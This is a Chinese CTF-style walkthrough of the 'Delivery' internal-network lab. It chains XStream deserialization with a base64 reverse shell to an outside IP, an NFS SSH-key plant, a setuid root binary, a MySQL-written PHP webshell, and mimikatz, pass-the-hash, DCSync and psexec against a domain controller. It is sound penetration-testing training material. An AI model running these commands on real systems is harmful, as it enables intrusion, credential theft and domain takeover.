【内网渗透】最保姆级的春秋云镜Delivery打靶笔记

目录

flag1

flag2

flag3 

flag4

---

flag1

fscan扫外网

匿名连接ftp

ftp 39.98.122.67
anonymous

get pom.xml 

 

pom.xml里有xstream和cc依赖

 

访问http://39.98.122.67:8080/ 是一个web

 随便填一下数据抓包发现是以xml格式传输数据，可以打用xstream反序列化打CC依赖

 vulhub/xstream/CVE-2021-29505/README.zh-cn.md at master · vulhub/vulhub · GitHub

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1338 CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuMjIyLjEzNi4zMy8xMzM3IDA+JjE=}|{base64,-d}|{bash,-i}"

成功弹上shell

读到flag1

flag2

 wget下载frp和fscan，扫内网，搭隧道

172.22.13.14 本机
172.22.13.57 CentOS
172.22.13.28 OA系统、mysql弱口令root/123456
172.22.13.6  WIN-DC DC域 

第二关提示要打NFS 

 

 扫一下2049端口

 NFS漏洞利用

靶机上下载nfs_offline

nfs_offline_install.sh

wget http://archive.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.3.4-2.5ubuntu3_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/libn/libnfsidmap/libnfsidmap2_0.25-5.1ubuntu1_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/libt/libtirpc/libtirpc3_1.2.5-1_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/r/rpcbind/rpcbind_1.2.5-8_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/k/keyutils/keyutils_1.6-6ubuntu1_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/libt/libtirpc/libtirpc-common_1.2.5-1_all.deb
sudo dpkg -i libnfsidmap2_0.25-5.1ubuntu1_amd64.deb && \
sudo dpkg -i libtirpc-common_1.2.5-1_all.deb && \
sudo dpkg -i libtirpc3_1.2.5-1_amd64.deb && \
sudo dpkg -i rpcbind_1.2.5-8_amd64.deb && \
sudo dpkg -i keyutils_1.6-6ubuntu1_amd64.deb && \
sudo dpkg -i nfs-common_1.3.4-2.5ubuntu3_amd64.deb

showmount -e 172.22.13.57

mkdir temp
mount -t nfs 172.22.13.57:/ ./temp -o nolock

写入ssh公钥 

ssh-keygen -t rsa -b 4096
cd /temp/home/joyce/
mkdir .ssh
cat /root/.ssh/id_rsa.pub >> /temp/home/joyce/.ssh/authorized_keys

编译恶意c文件，给到suid root

echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > root.c
gcc root.c -o root
chmod +s root

私钥连接ssh，起一个交互shell 

ssh -i /root/.ssh/id_rsa [email protected]
python3 -c 'import pty;pty.spawn("/bin/bash")'

 

 运行恶意提权文件拿到root

 读到flag2

flag3 

然后打之前内网扫出来的mysql

navicat连root/123456

show variables like "secure_file_priv";
show variables like "%general%";

发现是phpstudy起的服务，并且可以写web文件 

 

写webshell 

select "<?php eval($_POST[1]);?>" into outfile "C:/phpstudy_pro/WWW/1.php";

 连蚁剑

读到flag3

 

flag4

还差个WIN-DC要打

先新建个用户rdp上去方便以管理员身份操作

 

上传猕猴桃抓下密码

privilege::debug
sekurlsa::logonpasswords

抓到机器用户的NTLM哈希

 打pth拿到SYSTEM

sekurlsa::pth /user:WIN-HAUWOLAO$ /domain:XIAORANG.LAB /ntlm:f50cf41c345d71bc9b862d3568f5b303

BloodHound搜集一下信息 

WIN-HAUWOLAO有CHENGLEI的session，而CHENGLEI属于ACL Admins 组，ACL Admins 组对 WIN-DC 具有 WriteDacl 权限

前面猕猴桃也抓到了chenglei的哈希

给chenglei去添加DCSync权限

proxychains4 python dacledit.py xiaorang.lab/chenglei -hashes :0c00801c30594a1b8eaa889d237c5382 -action write -rights DCSync -principal chenglei -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.13.6

 dump下来域管的哈希

proxychains4 impacket-secretsdump xiaorang.lab/[email protected] -hashes :0c00801c30594a1b8eaa889d237c5382 -just-dc-ntlm

pth横向

proxychains4 python psexec.py -hashes :6341235defdaed66fb7b682665752c9a XIAORANG/[email protected]

读到flag4